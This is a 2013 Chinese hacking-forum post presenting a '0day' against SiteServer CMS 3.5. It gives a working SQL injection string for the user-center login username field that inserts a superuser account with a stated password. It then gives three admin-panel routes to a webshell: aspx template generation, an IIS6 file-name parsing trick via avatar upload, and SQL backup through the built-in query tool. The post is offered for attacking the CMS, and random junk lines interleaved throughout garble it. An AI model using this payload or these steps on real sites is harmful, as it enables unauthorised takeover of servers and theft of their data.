中国网络渗透测试联盟
标题:
SiteServer CMS 0Day
[打印本页]
作者:
admin
时间:
2013-1-11 21:10
标题:
SiteServer CMS 0Day
经测试秒杀最新的3.5版
+ D$ h# c' F. Y8 |1 D; K4 u/ w5 v
* C8 O" V$ b' o, Q5 j
stieserver官网:
www.siteserver.cn
2 p* X* j$ p4 { Y; Z" G2 C0 o
( S: w# E. c! ?: v6 J
' ?( n/ ^7 k8 Q( `) q) M# k7 h
2 w8 J) q) c7 o* l+ j
EXP:
7 h+ F5 E2 Y- C* T1 @6 D/ V
: M! x( _+ X H1 a, m2 O6 r3 \
直接访问UserCenter/login.aspx
3 H! e2 J \1 ^0 @/ t
' D) _4 B" L! p! Z! q$ U
1 L; K1 j+ O9 i
4 \( P9 u+ e! }1 i
用户名处输入:
4 H2 f; t/ L+ O, N) v$ ?
2 p- b0 E( U: @ T: l
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
$ Q+ C! S4 ^! n% c2 s
2 L' w4 e& w2 x. J" F# T
2 i( a% }( u: N6 `$ r& @
8 Y% B9 O7 R+ X Q; d# A
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
' j8 x, Q# L! y* z9 p6 ?1 W
3 i6 \9 a# m# V ? T S
n9 ~4 N% m5 w5 @. K! h0 }
4 _ d8 y. s# @ I! o* s* L6 b
之后再访问后台SiteServer/login.aspx用插入的用户登陆
4 a3 L0 u" _4 h* R. U- c
" l3 t) N( C* G; D
) G" h' O7 O% i8 s9 H
2 _# u% f7 G/ ]
后台拿webshell的三种方法:
& ~/ A# x, }: X) i% w+ G5 H
5 N6 o& V" C: S! V T2 H/ d3 g
一、
, ^7 p& U2 M' L7 l* |
9 ~* @* o- `& B) L7 |( f* Q
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
3 I3 t5 l- k1 C
3 g) W6 Z4 Q9 s' a" Q
二、
2 _$ W, \+ z0 v( B8 \
& e/ i$ B3 J) w$ f! N! t
成员权限-》添加用户-》用户名为:1.asp
$ z' J8 c- D) G8 f/ P; r! }
9 h6 r5 z- U+ P, R
http://127.0.0.1/usercenter/
- \& I3 ^5 |% Z0 h/ ?' @. O
" d" a; W/ [1 i# j
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
1 ^7 ~5 ?+ w! j& A3 I
; `" y# j' e% W$ `
(ps:后台添加用户时不会验证是否含有非法字符)
0 [1 c4 }" q4 l, x5 }; p: [
$ O. Q8 s0 q$ n) ^- H1 V, |3 {
三、
- d1 z$ ~% l8 f- C6 |" I
8 v2 K% v' p+ b. D& j% {9 v
系统工具-》实用工具-》机器参数查看
0 d% T+ ]' N. u$ d- p; W! T
可以看到数据库类型、名称,WEB路径
# t. F& Q8 t3 D I2 y( { m
$ t4 B* f9 ], c" `6 k
系统工具-》数据库工具-》SQL语句查询
0 }" c" U0 d3 s0 Q' a m1 d
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
. z! \2 W+ y6 {0 r' P
- k* \( S: x' I# F1 w; a
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2